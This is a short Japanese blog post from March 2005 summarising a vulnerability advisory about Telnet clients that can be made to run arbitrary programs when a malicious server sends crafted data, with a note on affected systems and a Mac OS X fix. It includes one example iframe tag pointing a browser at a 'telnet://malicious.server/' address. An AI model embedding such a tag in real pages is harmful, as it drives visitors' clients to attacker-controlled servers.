2005-03-30 複数のTelnetクライアントにセキュリティ・ホール,任意のプログラムを実行させられる(IT Pro) Security かなり、影響広そうなんですけど。 脆弱性 接続中のTelnetサーバーから細工が施されたデータを送信されると,任意のプログラム(バックドアやウイルスなど)を実行させられる可能性 対象 現時点(3月30日12時)の「Vulnerability Note」では「Unknown(未確認)」が目立つ。Debianのnetkit-telnet,MIT krb5,Solaris 7〜10に含まれるtelnetでは,今回のセキュリティ・ホールが確認されている。iDEFENSEでは,ALT LinuxやMac OS X,FreeBSD,Red Hatなどに含まれるtelnetでも確認 Telnetクライアントで明示的にアクセスしなくても,悪意のあるTelnetサーバーへ接続させられる可能性があるので要注意。例えば,<iframe src='telnet://malicious.server/'>といったタグが含まれるWebページをブラウザで閲覧すると,登録されているTelnetクライアントが自動的に起動されて「malicious.server」へアクセスさせられる。 Mac OS Xは、3月21日公開の修正プログラムで対応できるようです。